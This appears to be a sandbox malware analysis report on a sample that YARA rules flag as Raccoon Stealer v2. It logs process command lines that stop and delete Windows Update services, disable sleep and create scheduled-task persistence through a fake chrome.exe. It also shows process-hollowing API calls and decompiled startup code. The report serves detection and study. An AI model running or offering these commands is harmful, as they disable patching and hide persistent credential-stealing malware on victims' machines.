Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000027.00000002.356932186.0000000000C28000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000027.00000003.355141479.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 3776, Parent PID: 4560

General

Target ID:	40
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6f2a00000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 732, Parent PID: 6028

General

Target ID:	41
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2136, Parent PID: 2348

General

Target ID:	42
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4936, Parent PID: 1852

General

Target ID:	43
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 1708, Parent PID: 3956

General

Target ID:	44
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff6b0ea0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6008, Parent PID: 732

General

Target ID:	45
Start time:	01:32:43
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5716, Parent PID: 6028

General

Target ID:	46
Start time:	01:32:45
Start date:	05/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5720, Parent PID: 4984

General

Target ID:	47
Start time:	01:32:45
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5824, Parent PID: 4560

General

Target ID:	48
Start time:	01:32:45
Start date:	05/12/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6f2a00000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5984, Parent PID: 5716

General

Target ID:	49
Start time:	01:32:46
Start date:	05/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 4780, Parent PID: 3956

General

Target ID:	50
Start time:	01:32:46
Start date:	05/12/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff6b0ea0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 1004, Parent PID: 6028

General

Target ID:	51
Start time:	01:32:46
Start date:	05/12/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0x2d0000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 1504, Parent PID: 1080

General

Target ID:	52
Start time:	01:32:47
Start date:	05/12/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\chrome.exe
Imagebase:	0xb20000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 5316, Parent PID: 4984

General

Target ID:	53
Start time:	01:32:52
Start date:	05/12/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0x11f0000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000035.00000002.458015217.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5768, Parent PID: 4560

General

Target ID:	54
Start time:	01:32:53
Start date:	05/12/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6f2a00000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 3780, Parent PID: 3956

General

Target ID:	55
Start time:	01:32:53
Start date:	05/12/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff6b0ea0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 5244, Parent PID: 4560

General

Target ID:	56
Start time:	01:32:54
Start date:	05/12/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6f2a00000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powercfg.exePID: 4044, Parent PID: 3956

General

Target ID:	57
Start time:	01:32:55
Start date:	05/12/2022
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff6b0ea0000
File size:	94720 bytes
MD5 hash:	7C749DC22FCB1ED42A87AFA986B720F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 1176, Parent PID: 4560

General

Target ID:	58
Start time:	01:32:56
Start date:	05/12/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6f2a00000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: GoogleUpdate.exePID: 5320, Parent PID: 6028

General

Target ID:	59
Start time:	01:32:56
Start date:	05/12/2022
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0x2d0000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5420, Parent PID: 4560

General

Target ID:	60
Start time:	01:32:57
Start date:	05/12/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff7dca70000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 5400, Parent PID: 4560

General

Target ID:	61
Start time:	01:32:58
Start date:	05/12/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff7dca70000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: N2wufLmC74.exePID: 6060, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	13.7%
Signature Coverage:	13.7%
Total number of Nodes:	146
Total number of Limit Nodes:	11

Executed Functions

Function 014811A1 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 01481482
GetThreadContext.KERNELBASE(?,00010007), ref: 01481497
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014814B8
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 014814EA
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0148150A
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 0148163D
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 0148165A
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 014816C4
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 014816E6
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01481701
SetThreadContext.KERNELBASE(?,00010007), ref: 0148171E
ResumeThread.KERNELBASE(?), ref: 0148172B

Strings

D, xrefs: 014813DA

Memory Dump Source

Source File: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: fd6ea1c1f71a08b22051e1c5599e239e616a68c0914a24b0f730c3de67b018ee
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 2E12F871D00219DFEB21DFA4CD84BEEBBB5FF04704F1484AAE649A6260E7749A85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 013C1150 Relevance: 15.2, APIs: 10, Instructions: 162
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E013C1150(char _a4) {
				void* _v24;
				signed short _v52;
				signed char _v56;
				char _v100;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				void* _v136;
				signed int _v140;
				void* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t44;
				_Unknown_base(*)()* _t46;
				signed char** _t48;
				signed char* _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t54;
				signed int _t57;
				intOrPtr _t59;
				signed int _t61;
				void* _t63;
				signed int _t66;
				signed int _t73;
				signed int _t75;
				void* _t78;
				char* _t81;
				signed int _t84;
				struct _STARTUPINFOA* _t90;
				signed int _t91;
				signed int _t92;
				signed int* _t93;
				intOrPtr _t99;
				signed int* _t102;
				intOrPtr* _t105;
				signed int _t106;
				signed int _t109;
				signed int _t114;
				void* _t117;
				signed int* _t118;

				L0:
				while(1) {
					L0:
					_t81 =  &_a4;
					_push( *((intOrPtr*)(_t81 - 4)));
					_t90 =  &_v100;
					_push(_t81);
					memset(_t90, 0, 0x11 << 2);
					_t117 = (_t114 & 0xfffffff0) - 0x78 + 0xc;
					if( *0x14f2060 != 0) {
						GetStartupInfoA(_t90);
						_t117 = _t117 - 4;
					}
					_t99 =  *((intOrPtr*)( *[fs:0x18] + 4));
					_t105 = Sleep;
					while(1) {
						L4:
						asm("lock cmpxchg [0x14f2ac4], edi");
						if(0 == 0) {
							break;
						}
						L2:
						if(_t99 == 0) {
							L36:
							_t73 = 1;
							if( *0x14f2ac0 != 1) {
								L6:
								if( *0x14f2ac0 == 0) {
									_v140 = 0x14f4014;
									_v144 = 0x14f400c;
									 *0x14f2ac0 = 1;
									L013E42D0();
								} else {
									 *0x14f2008 = 1;
								}
								if( *0x14f2ac0 == 1) {
									L38:
									_v140 = 0x14f4008;
									_v144 = 0x14f4000;
									L013E42D0();
									 *0x14f2ac0 = 2;
									if(_t73 != 0) {
										goto L10;
									}
									goto L39;
								} else {
									L9:
									if(_t73 == 0) {
										L39:
										_t32 = _t73;
										_t73 =  *0x14f2ac4;
										 *0x14f2ac4 = _t32;
									}
									L10:
									_t44 =  *0x14ac1f0; // 0x13d5370
									if(_t44 != 0) {
										_v136 = 0;
										_v140 = 2;
										_v144 = 0;
										 *_t44();
										_t117 = _t117 - 0xc;
									}
									E013D5660(_t73, _t99, _t105);
									_v144 = E013D5990; // executed
									_t46 = SetUnhandledExceptionFilter(??); // executed
									_t118 = _t117 - 4;
									 *0x14f2078 = _t46;
									 *_t118 = 0x13c1000;
									_t48 = E013D5490(E013E3CB0());
									 *0x14f2ab8 = 0x13c0000;
									L013E4268();
									_t84 = 0;
									_t49 =  *_t48;
									if(_t49 != 0) {
										while(1) {
											L18:
											_t91 =  *_t49 & 0x000000ff;
											if(_t91 <= 0x20) {
												goto L14;
											}
											L19:
											_t84 =  ==  ? _t84 ^ 0x00000001 : _t84;
											L17:
											_t49 =  &(_t49[1]);
											L18:
											_t91 =  *_t49 & 0x000000ff;
											if(_t91 <= 0x20) {
												goto L14;
											}
											goto L19;
											L14:
											if(_t91 == 0 || (_t84 & 0x00000001) == 0) {
												L20:
												if(_t91 != 0) {
													while(1) {
														L23:
														_t49 =  &(_t49[1]);
														_t92 =  *_t49 & 0x000000ff;
														if(_t92 == 0) {
															break;
														}
														L22:
														if(_t92 > 0x20) {
															break;
														}
													}
													L24:
													 *0x14f2abc = _t49;
													goto L25;
												}
												L21:
												goto L24;
											} else {
												L16:
												_t84 = 1;
												goto L17;
											}
										}
									} else {
										L13:
										L25:
										if( *0x14f2060 != 0) {
											_t66 = 0xa;
											if((_v56 & 0x00000001) != 0) {
												_t66 = _v52 & 0x0000ffff;
											}
											 *0x1481000 = _t66;
										}
										_t75 =  *0x14f201c;
										_t106 = 4 + _t75 * 4;
										 *_t118 = _t106;
										_t50 = malloc(??);
										_t93 =  *0x14f2018;
										_v120 = _t50;
										if(_t75 <= 0) {
											L43:
											_t51 = _v120;
											goto L33;
										} else {
											L30:
											_t78 = _t50;
											_t15 = _t106 - 4; // 0x74cb648c
											_t59 = _t15;
											_t102 = _t93;
											_v124 = _t59;
											_v116 = _t59 + _t93;
											do {
												L31:
												_t61 =  *_t102;
												_t78 = _t78 + 4;
												_t102 =  &(_t102[1]);
												 *_t118 = _t61;
												_t18 = strlen(??) + 1; // 0x1
												_t109 = _t18;
												 *_t118 = _t109;
												_t63 = malloc(??);
												 *(_t78 - 4) = _t63;
												_v140 = _t109;
												_v144 =  *((intOrPtr*)(_t102 - 4));
												 *_t118 = _t63;
												memcpy(??, ??, ??);
											} while (_v116 != _t102);
											_t51 = _v124 + _v120;
											L33:
											 *_t51 = 0;
											 *0x14f2018 = _v120;
											E013D52F0();
											_t54 =  *0x14f2014;
											 *__imp____initenv = _t54;
											_v140 = _t54;
											_v144 =  *0x14f2018;
											 *_t118 =  *0x14f201c; // executed
											_t57 = L013CC2E9(_t75, _t99); // executed
											 *0x14f2010 = _t57;
											if( *0x14f200c == 0) {
												L44:
												 *_t118 = _t57; // executed
												exit(??); // executed
												 *0x14f2060 = 1;
												goto L0;
											}
											L34:
											if( *0x14f2008 == 0) {
												L013E4298();
												return  *0x14f2010;
											} else {
												return _t57;
											}
										}
									}
								}
							}
							L37:
							_v144 = 0x1f;
							L013E4290();
							if( *0x14f2ac0 != 1) {
								goto L9;
							}
							goto L38;
						}
						L3:
						_v144 = 0x3e8;
						 *_t105();
						_t117 = _t117 - 4;
					}
					L5:
					_t73 = 0;
					if( *0x14f2ac0 == 1) {
						goto L37;
					}
					goto L6;
				}
			}

0x013c1150
0x013c1150
0x013c1150
0x013c1150
0x013c1159
0x013c1161
0x013c1167
0x013c1176
0x013c1176
0x013c117a
0x013c1413
0x013c1419
0x013c1419
0x013c1188
0x013c118b
0x013c11a7
0x013c11a7
0x013c11a9
0x013c11b3
0x00000000
0x00000000
0x013c1193
0x013c1195
0x013c13b0
0x013c13b5
0x013c13bd
0x013c11c5
0x013c11cc
0x013c1440
0x013c1448
0x013c144f
0x013c1459
0x013c11d2
0x013c11d2
0x013c11d2
0x013c11e4
0x013c13dd
0x013c13dd
0x013c13e5
0x013c13ec
0x013c13f1
0x013c13fd
0x00000000
0x00000000
0x00000000
0x013c11ea
0x013c11ea
0x013c11ec
0x013c1403
0x013c1403
0x013c1403
0x013c1403
0x013c1403
0x013c11f2
0x013c11f2
0x013c11f9
0x013c11fb
0x013c1203
0x013c120b
0x013c1212
0x013c1214
0x013c1214
0x013c1217
0x013c121c
0x013c1223
0x013c1229
0x013c122c
0x013c1231
0x013c123d
0x013c1242
0x013c124c
0x013c1251
0x013c1253
0x013c1257
0x013c1271
0x013c1271
0x013c1271
0x013c1277
0x00000000
0x00000000
0x013c1279
0x013c1281
0x013c126e
0x013c126e
0x013c1271
0x013c1271
0x013c1277
0x00000000
0x00000000
0x00000000
0x013c1260
0x013c1262
0x013c1290
0x013c1292
0x013c12a5
0x013c12a5
0x013c12a5
0x013c12a8
0x013c12ad
0x00000000
0x00000000
0x013c12a0
0x013c12a3
0x00000000
0x00000000
0x013c12a3
0x013c12af
0x013c12af
0x00000000
0x013c12af
0x013c1294
0x00000000
0x013c1269
0x013c1269
0x013c1269
0x00000000
0x013c1269
0x013c1262
0x013c1259
0x013c1259
0x013c12b4
0x013c12bc
0x013c12be
0x013c12c7
0x013c12c9
0x013c12c9
0x013c12cd
0x013c12cd
0x013c12d2
0x013c12d8
0x013c12df
0x013c12e2
0x013c12e7
0x013c12ed
0x013c12f2
0x013c1463
0x013c1463
0x00000000
0x013c12f8
0x013c12f8
0x013c12f8
0x013c12fa
0x013c12fa
0x013c12fd
0x013c12ff
0x013c1304
0x013c1310
0x013c1310
0x013c1310
0x013c1312
0x013c1315
0x013c1318
0x013c1320
0x013c1320
0x013c1323
0x013c1326
0x013c132b
0x013c1331
0x013c1335
0x013c1339
0x013c133c
0x013c1341
0x013c1349
0x013c134c
0x013c134c
0x013c1355
0x013c135a
0x013c135f
0x013c136a
0x013c136c
0x013c1375
0x013c137e
0x013c1381
0x013c138c
0x013c1393
0x013c146b
0x013c146b
0x013c146e
0x013c1480
0x00000000
0x013c1480
0x013c1399
0x013c13a1
0x013c1421
0x013c1436
0x013c13a3
0x013c13ae
0x013c13ae
0x013c13a1
0x013c12f2
0x013c1257
0x013c11e4
0x013c13c3
0x013c13c3
0x013c13ca
0x013c13d7
0x00000000
0x00000000
0x00000000
0x013c13d7
0x013c119b
0x013c119b
0x013c11a2
0x013c11a4
0x013c11a4
0x013c11b5
0x013c11ba
0x013c11bf
0x00000000
0x00000000
0x00000000
0x013c11bf

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 013C1223
__p__acmdln.MSVCRT ref: 013C124C
malloc.MSVCRT ref: 013C12E2
strlen.MSVCRT ref: 013C131B
malloc.MSVCRT ref: 013C1326
memcpy.MSVCRT ref: 013C133C
_amsg_exit.MSVCRT ref: 013C13CA
_initterm.MSVCRT ref: 013C13EC
_initterm.MSVCRT ref: 013C1459

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: _inittermmalloc$ExceptionFilterUnhandled__p__acmdln_amsg_exitmemcpystrlen
String ID:
API String ID: 760028103-0
Opcode ID: 3bfa114c8808acdd0468f8131848eb15413260b26e70a77a03d582e690dfa74f
Instruction ID: dadfbd241de87ec4b794e562b237d7a15b6624a6118d6ba4a6c645ded59151a9
Opcode Fuzzy Hash: 3bfa114c8808acdd0468f8131848eb15413260b26e70a77a03d582e690dfa74f
Instruction Fuzzy Hash: 116176B2A04211CFEB20EFA8E484B59BBF1FB84708F14442DDA45E7355D7B4E828DB91

Uniqueness

Uniqueness Score: -1.00%

Function 013C119B Relevance: 9.1, APIs: 6, Instructions: 113
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 013C1223
__p__acmdln.MSVCRT ref: 013C124C
malloc.MSVCRT ref: 013C12E2
strlen.MSVCRT ref: 013C131B
malloc.MSVCRT ref: 013C1326
memcpy.MSVCRT ref: 013C133C
_amsg_exit.MSVCRT ref: 013C13CA
_initterm.MSVCRT ref: 013C13EC
_initterm.MSVCRT ref: 013C1459

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: _inittermmalloc$ExceptionFilterUnhandled__p__acmdln_amsg_exitmemcpystrlen
String ID:
API String ID: 760028103-0
Opcode ID: 757b1a9c1ebf295089dbea9f277a824fe20ecb768ef6b7221cc2a70fb70782b4
Instruction ID: 876fad64aa87cc98d4327a963ce4dcdb27f887b0709213d09dbca6ae057ec644
Opcode Fuzzy Hash: 757b1a9c1ebf295089dbea9f277a824fe20ecb768ef6b7221cc2a70fb70782b4
Instruction Fuzzy Hash: 1D4188B5A04311CFEB20EFA8E084B59BBF1BB44708F10842DDA48D7315D7B0D858DB91

Uniqueness

Uniqueness Score: -1.00%

Function 013C35D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 013C36E7

Strings

w, xrefs: 013C3670
@, xrefs: 013C36D2

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
